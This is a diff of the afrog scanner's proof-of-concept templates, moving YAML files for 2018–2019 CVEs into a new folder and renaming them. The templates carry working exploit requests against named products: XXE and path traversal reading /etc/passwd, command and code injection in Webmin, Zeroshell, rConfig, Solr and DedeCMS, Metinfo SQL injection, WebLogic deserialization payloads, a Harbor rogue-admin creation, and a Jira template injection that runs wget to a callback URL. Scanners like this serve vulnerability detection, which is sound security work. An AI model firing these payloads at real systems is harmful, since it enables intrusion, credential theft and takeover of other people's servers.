6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
18	15		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/CVE-2018-8033.yml afrog-pocs/CVE/2018/CVE-2018-8033.yaml

		skipped 4 lines
5	5		author: pikpikcu
6	6		severity: high
7	7		description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
8		-	tags: cve,cve2018,apache,ofbiz,xxe
9		-	classification:
10		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
11		-	cvss-score: 7.50
12		-	cve-id: CVE-2018-8033
13		-	cwe-id: CWE-200
14	8		reference:
15	9		- https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E
	10	+	- https://nvd.nist.gov/vuln/detail/CVE-2018-8033
16	11
17		-	manual: true
18		-	transport: http
19	12		rules:
20	13		r0:
21	14		request:
22		-	cache: true
23	15		method: POST
24	16		path: /webtools/control/xmlrpc
25	17		headers:
26	18		Content-Type: application/xml
27	19		body: <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
28		-	follow_redirects: false
29	20		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
30	21		expression: r0()
31	22

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/razor-cve-2018-8770.yml afrog-pocs/CVE/2018/CVE-2018-8770.yaml

1		-	id: razor-cve-2018-8770
	1	+	id: CVE-2018-8770
2	2
3	3		info:
4		-	name: razor-cve-2018-8770
	4	+	name: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
5	5		author: we1x4n(https://we1x4n.github.io/)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /tests/generate.php
16		-	follow_redirects: false
17	13		expression: 'response.status == 200 && response.body.bcontains(b"Fatal error: Class ''PHPUnit_Framework_TestCase'' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")'
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/dvr-cve-2018-9995.yml afrog-pocs/CVE/2018/CVE-2018-9995.yaml

1		-	id: dvr-cve-2018-9995
	1	+	id: CVE-2018-9995
2	2
3	3		info:
4		-	name: dvr-cve-2018-9995
	4	+	name: DVR Authentication Bypass
5	5		author: cc_ci(https://github.com/cc8ci)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /device.rsp?opt=user&cmd=list
16	13		headers:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/solr-cve-2019-0193.yml afrog-pocs/CVE/2019/CVE-2019-0193.yaml

1		-	id: solr-cve-2019-0193
	1	+	id: CVE-2019-0193
2	2
3	3		info:
4		-	name: solr-cve-2019-0193
	4	+	name: Apache Solr Remote Code Execution
5	5		author: fnmsd(https://github.com/fnmsd)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /solr/admin/cores?wt=json
19		-	follow_redirects: false
20	16		expression: response.status == 200 && response.body.bcontains(b"responseHeader")
21	17		output:
22	18		search: '"\"name\":\"(?P<core>.*?)\"".bsubmatch(response.body)'
23	19		core: search["core"]
24	20		r1:
25	21		request:
26		-	cache: true
27	22		method: POST
28	23		path: /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}%2B{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E
29	24		headers:
		skipped 4 lines
34	29		<book>
35	30		</book>
36	31		</books>
37		-	follow_redirects: false
38	32		expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
39	33		expression: r0() && r1()
40	34

afrog-pocs/cve/2019/CVE-2019-10758.yml afrog-pocs/CVE/2019/CVE-2019-10758.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/pulse-cve-2019-11510.yml afrog-pocs/CVE/2019/CVE-2019-11510.yaml

1		-	id: pulse-cve-2019-11510
	1	+	id: CVE-2019-11510
2	2
3	3		info:
4		-	name: pulse-cve-2019-11510
	4	+	name: Pulse Connect Secure SSL VPN Arbitrary File Read
5	5		author: leezp
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/jira-cve-2019-11581.yml afrog-pocs/CVE/2019/CVE-2019-11581.yaml

1		-	id: jira-cve-2019-11581
	1	+	id: CVE-2019-11581
2	2
3	3		info:
4		-	name: jira-cve-2019-11581
	4	+	name: Jira 未授权服务端模板注入
5	5		author: harris2015(https://github.com/harris2015)
6	6		severity: critical
	7	+	reference:
	8	+	- https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw
7	9
8		-	manual: true
9		-	transport: http
10	10		set:
11	11		reverse: newReverse()
12	12		reverseUrl: reverse.url
13	13		rules:
14	14		r0:
15	15		request:
16		-	cache: true
17	16		method: GET
18	17		path: /secure/ContactAdministrators!default.jspa
19		-	follow_redirects: false
20	18		expression: response.status == 200
21	19		output:
22	20		search: '"name=\"atlassian-token\" content=\"(?P<token>.+?)\"".bsubmatch(response.body)'
23	21		token: search["token"]
24	22		r1:
25	23		request:
26		-	cache: true
27	24		method: POST
28	25		path: /secure/ContactAdministrators.jspa
29	26		body: from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
30		-	follow_redirects: false
31	27		expression: response.status == 302 && reverse.wait(5)
32	28		expression: r0() && r1()
33	29
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/zeroshell-cve-2019-12725-rce.yml afrog-pocs/CVE/2019/CVE-2019-12725.yaml

1		-	id: zeroshell-cve-2019-12725-rce
	1	+	id: CVE-2019-12725
2	2
3	3		info:
4		-	name: zeroshell-cve-2019-12725-rce
	4	+	name: Zeroshell 3.9.0 Remote Command Execution
5	5		author: YekkoY
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
19		-	follow_redirects: false
20	16		expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
21	17		expression: r0()
22	18

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/webmin-cve-2019-15107-rce.yml afrog-pocs/CVE/2019/CVE-2019-15107.yaml

1		-	id: webmin-cve-2019-15107-rce
	1	+	id: CVE-2019-15107
2	2
3	3		info:
4		-	name: webmin-cve-2019-15107-rce
	4	+	name: Webmin <= 1.920 Unauthenticated Remote Command Execution
5	5		author: danta
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
		skipped 1 lines
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: POST
19	16		path: /password_change.cgi
20	17		headers:
21	18		Referer: '{{url}}'
22	19		body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2
23		-	follow_redirects: false
24	20		expression: response.body.bcontains(bytes(string(r1 + r2)))
25	21		expression: r0()
26	22

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/harbor-cve-2019-16097.yml afrog-pocs/CVE/2019/CVE-2019-16097.yaml

1		-	id: harbor-cve-2019-16097
	1	+	id: CVE-2019-16097
2	2
3	3		info:
4		-	name: harbor-cve-2019-16097
	4	+	name: Harbor Enables Privilege Escalation From Zero to admin
5	5		author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(5, 10)
12	10		r2: randomLowercase(r1)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /
19	16		expression: response.body.bcontains(b"Harbor")
20	17		r1:
21	18		request:
22		-	cache: true
23	19		method: POST
24	20		path: /api/users
25	21		headers:
26	22		Content-Type: application/json
27	23		body: '{"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}", "email": "{{r2}}@example.com", "realname": "{{r2}}"}'
28		-	follow_redirects: false
29	24		expression: response.status == 201
30	25		expression: r0() && r1()
31	26
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nhttpd-cve-2019-16278.yml afrog-pocs/CVE/2019/CVE-2019-16278.yaml

1		-	id: nhttpd-cve-2019-16278
	1	+	id: CVE-2019-16278
2	2
3	3		info:
4		-	name: nhttpd-cve-2019-16278
	4	+	name: Nostromo 1.9.6 - Remote Code Execution
5	5		author: Loneyer
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
19	16		body: \|
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/ifw8-router-cve-2019-16313.yml afrog-pocs/CVE/2019/CVE-2019-16313.yaml

1		-	id: ifw8-router-cve-2019-16313
	1	+	id: CVE-2019-16313
2	2
3	3		info:
4		-	name: ifw8-router-cve-2019-16313
	4	+	name: ifw8 Router ROM v4.31 Credential Discovery
5	5		author: cc_ci(https://github.com/cc8ci)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /index.htm?PAGE=web
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
18	14		r1:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /action/usermanager.htm
23		-	follow_redirects: false
24	18		expression: response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
25	19		expression: r0() && r1()
26	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/rconfig-cve-2019-16663.yml afrog-pocs/CVE/2019/CVE-2019-16663.yaml

1		-	id: rconfig-cve-2019-16663
	1	+	id: CVE-2019-16663
2	2
3	3		info:
4		-	name: rconfig-cve-2019-16663
	4	+	name: rConfig v3.9.2 RCE
5	5		author: 17bdw
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(800000000, 1000000000)
12	10		r1: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23
19	16		expression: response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/vbulletin-cve-2019-16759-bypass.yml afrog-pocs/CVE/2019/CVE-2019-16759.yaml

1		-	id: vbulletin-cve-2019-16759-bypass
	1	+	id: CVE-2019-16759
2	2
3	3		info:
4		-	name: vbulletin-cve-2019-16759-bypass
	4	+	name: vBulletin v5.0.0-v5.5.4 Remote Command Execution
5	5		author: Loneyer
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		f1: randomInt(800000000, 900000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /ajax/render/widget_tabbedcontainer_tab_panel
18	15		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/dlink-cve-2019-16920-rce.yml afrog-pocs/CVE/2019/CVE-2019-16920.yaml

1		-	id: dlink-cve-2019-16920-rce
	1	+	id: CVE-2019-16920
2	2
3	3		info:
4		-	name: dlink-cve-2019-16920-rce
	4	+	name: D-Link Unauthenticated remote code
5	5		author: JingLing(https://hackfun.org/)
6	6		severity: critical
7	7		description: fofa app="D_Link-Router"
	8	+	reference:
	9	+	- https://nvd.nist.gov/vuln/detail/CVE-2019-16920
8	10
9		-	manual: true
10		-	transport: http
11	11		set:
12	12		reverse: newReverse()
13	13		reverseURL: reverse.url
14	14		rules:
15	15		r0:
16	16		request:
17		-	cache: true
18	17		method: POST
19	18		path: /apply_sec.cgi
20	19		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/metinfo-cve-2019-16996-sqli.yml afrog-pocs/CVE/2019/CVE-2019-16996.yaml

1		-	id: metinfo-cve-2019-16996-sqli
	1	+	id: CVE-2019-16996
2	2
3	3		info:
4		-	name: metinfo-cve-2019-16996-sqli
	4	+	name: Metinfo 7.0.0beta SQL Inject
5	5		author: JingLing(https://hackfun.org/)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23
19	16		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/metinfo-cve-2019-16997-sqli.yml afrog-pocs/CVE/2019/CVE-2019-16997.yaml

1		-	id: metinfo-cve-2019-16997-sqli
	1	+	id: CVE-2019-16997
2	2
3	3		info:
4		-	name: metinfo-cve-2019-16997-sqli
	4	+	name: Metinfo sql inject
5	5		author: JingLing(https://hackfun.org/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /admin/?n=language&c=language_general&a=doExportPack
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/metinfo-cve-2019-17418-sqli.yml afrog-pocs/CVE/2019/CVE-2019-17418.yaml

1		-	id: metinfo-cve-2019-17418-sqli
	1	+	id: CVE-2019-17418
2	2
3	3		info:
4		-	name: metinfo-cve-2019-17418-sqli
	4	+	name: Metinfo sql inject
5	5		author: JingLing(https://hackfun.org/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin
19	16		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/dlink-cve-2019-17506.yml afrog-pocs/CVE/2019/CVE-2019-17506.yaml

1		-	id: dlink-cve-2019-17506
	1	+	id: CVE-2019-17506
2	2
3	3		info:
4		-	name: dlink-cve-2019-17506
	4	+	name: D-Link authentication
5	5		author: l1nk3r,Huasir(https://github.com/dahua966/)
6	6		severity: critical
	7	+	reference:
	8	+	- https://nvd.nist.gov/vuln/detail/CVE-2019-17506
7	9
8		-	manual: true
9		-	transport: http
10	10		rules:
11	11		r0:
12	12		request:
13		-	cache: true
14	13		method: POST
15	14		path: /getcfg.php
16	15		headers:
17	16		Content-Type: application/x-www-form-urlencoded
18	17		body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
19		-	follow_redirects: false
20	18		expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
21	19		expression: r0()
22	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/openfire-cve-2019-18394-ssrf.yml afrog-pocs/CVE/2019/CVE-2019-18394.yaml

1		-	id: openfire-cve-2019-18394-ssrf
	1	+	id: CVE-2019-18394
2	2
3	3		info:
4		-	name: openfire-cve-2019-18394-ssrf
	4	+	name: Openfire Full Read SSRF
5	5		author: su(https://suzzz112113.github.io/#blog)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /getFavicon?host=baidu.com/?
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com"))
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/citrix-cve-2019-19781-path-traversal.yml afrog-pocs/CVE/2019/CVE-2019-19781.yaml

1		-	id: citrix-cve-2019-19781-path-traversal
	1	+	id: CVE-2019-19781
2	2
3	3		info:
4		-	name: citrix-cve-2019-19781-path-traversal
	4	+	name: Citrix Application Delivery Controller (ADC) and Gateway Directory Traversal.
5	5		author: su(https://suzzz112113.github.io/#blog)
6	6		severity: critical
	7	+	reference:
	8	+	- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
7	9
8		-	manual: true
9		-	transport: http
10	10		rules:
11	11		r0:
12	12		request:
13		-	cache: true
14	13		method: GET
15	14		path: /vpn/../vpns/cfg/smb.conf
16		-	follow_redirects: false
17	15		expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
18	16		expression: r0()
19	17

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/wordpress-cve-2019-19985-infoleak.yml afrog-pocs/CVE/2019/CVE-2019-19985.yaml

1		-	id: wordpress-cve-2019-19985-infoleak
	1	+	id: CVE-2019-19985
2	2
3	3		info:
4		-	name: wordpress-cve-2019-19985-infoleak
	4	+	name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
5	5		author: bufsnake(https://github.com/bufsnake)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /wp-admin/admin.php?page=download_report&report=users&status=all
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"]))
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/tvt-nvms-1000-file-read-cve-2019-20085.yml afrog-pocs/CVE/2019/CVE-2019-20085.yaml

1		-	id: tvt-nvms-1000-file-read-cve-2019-20085
	1	+	id: CVE-2019-20085
2	2
3	3		info:
4		-	name: tvt-nvms-1000-file-read-cve-2019-20085
	4	+	name: TVT NVMS 1000 - Directory Traversal
5	5		author: fuzz7j(https://github.com/fuzz7j)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /Pages/login.htm
16	13		expression: response.status == 200 && response.body.bcontains(b"<title>NVMS-1000</title>")
17	14		r1:
18	15		request:
19		-	cache: true
20	16		method: GET
21	17		path: /../../../../../../../../../../../../windows/win.ini
22	18		expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/pandorafms-cve-2019-20224-rce.yml afrog-pocs/CVE/2019/CVE-2019-20224.yaml

1		-	id: pandorafms-cve-2019-20224-rce
	1	+	id: CVE-2019-20224
2	2
3	3		info:
4		-	name: pandorafms-cve-2019-20224-rce
	4	+	name: Pandora v7.0NG Post-auth Remote Code Execution
5	5		author: JingLing(https://hackfun.org/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		reverse: newReverse()
12	10		reverseURL: reverse.url
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/weblogic-cve-2019-2725.yml afrog-pocs/CVE/2019/CVE-2019-2725.yaml

1		-	id: weblogic-cve-2019-2725
	1	+	id: CVE-2019-2725
2	2
3	3		info:
4		-	name: weblogic-cve-2019-2725
	4	+	name: Oracle WebLogic Remote Code Execution
5	5		author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166)
6	6		severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		v100:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /wls-wsat/CoordinatorPortType
16	13		headers:
		skipped 15052 lines
15069	15066		</soapenv:Header>
15070	15067		<soapenv:Body></soapenv:Body>
15071	15068		</soapenv:Envelope>
15072		-	follow_redirects: false
15073	15069		expression: response.status == 200 && response.body.bcontains(b"whoami :")
15074	15070		v120:
15075	15071		request:
15076		-	cache: true
15077	15072		method: POST
15078	15073		path: /wls-wsat/CoordinatorPortType
15079	15074		headers:
15080	15075		Content-Type: text/xml
15081	15076		body: <?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"/><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void><void method="getWriter"><void method="write"><string/></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
15082		-	follow_redirects: true
15083	15077		expression: response.body.bcontains(b"225773091")
15084	15078		expression: v120() \|\| v100()
15085	15079
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/weblogic-cve-2019-2729.yml afrog-pocs/CVE/2019/CVE-2019-2729.yaml

1		-	id: weblogic-cve-2019-2729
	1	+	id: CVE-2019-2729
2	2
3	3		info:
4		-	name: weblogic-cve-2019-2729
5		-	author:
	4	+	name: Oracle WebLogic Remote Code Execution
	5	+	author: unkown
6	6		severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /wls-wsat/CoordinatorPortType
16	13		headers:
		skipped 15055 lines
15072	15069		<asy:onAsyncDelivery/>
15073	15070		</soapenv:Body>
15074	15071		</soapenv:Envelope>
15075		-	follow_redirects: false
15076	15072		expression: response.status == 200 && response.body.bcontains(b"whoami :")
15077	15073		expression: r0()
15078	15074

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/confluence-cve-2019-3396-lfi.yml afrog-pocs/CVE/2019/CVE-2019-3396.yaml

1		-	id: confluence-cve-2019-3396-lfi
	1	+	id: CVE-2019-3396
2	2
3	3		info:
4		-	name: confluence-cve-2019-3396-lfi
	4	+	name: Atlassian Confluence Path Traversal
5	5		author: sharecast
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /rest/tinymce/1/macro/preview
16	13		headers:
		skipped 8 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/springcloud-cve-2019-3799.yml afrog-pocs/CVE/2019/CVE-2019-3799.yaml

1		-	id: springcloud-cve-2019-3799
	1	+	id: CVE-2019-3799
2	2
3	3		info:
4		-	name: springcloud-cve-2019-3799
	4	+	name: Spring Cloud Config Server Directory Traversal
5	5		author: Loneyer
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd
16	13		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/youphptube-encoder-cve-2019-5128.yml afrog-pocs/CVE/2019/CVE-2019-5127.yaml

1		-	id: youphptube-encoder-cve-2019-5128
	1	+	id: CVE-2019-5128
2	2
3	3		info:
4	4		name: youphptube-encoder-cve-2019-5128
		skipped 26 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/drupal-cve-2019-6340.yml afrog-pocs/CVE/2019/CVE-2019-6340.yaml

1		-	id: drupal-cve-2019-6340
	1	+	id: CVE-2019-6340
2	2
3	3		info:
4		-	name: drupal-cve-2019-6340
	4	+	name: Drupal 8 core RESTful Web Services RCE
5	5		author: thatqier
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		host: request.url.host
12	10		r1: randomLowercase(4)
		skipped 1 lines
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: POST
19	16		path: /node/?_format=hal_json
20	17		headers:
		skipped 20 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/qnap-cve-2019-7192.yml afrog-pocs/CVE/2019/CVE-2019-7192.yaml

1		-	id: qnap-cve-2019-7192
	1	+	id: CVE-2019-7192
2	2
3	3		info:
4		-	name: qnap-cve-2019-7192
	4	+	name: QNAP PhotoStation Unauthorizated File Read
5	5		author: Hzllaga
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /photo/p/api/album.php
16	13		headers:
		skipped 5 lines
22	19		album_id: search["album_id"]
23	20		r1:
24	21		request:
25		-	cache: true
26	22		method: GET
27	23		path: /photo/slideshow.php?album={{album_id}}
28	24		expression: response.status == 200
		skipped 2 lines
31	27		access_code: search["access_code"]
32	28		r2:
33	29		request:
34		-	cache: true
35	30		method: POST
36	31		path: /photo/p/api/video.php
37	32		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

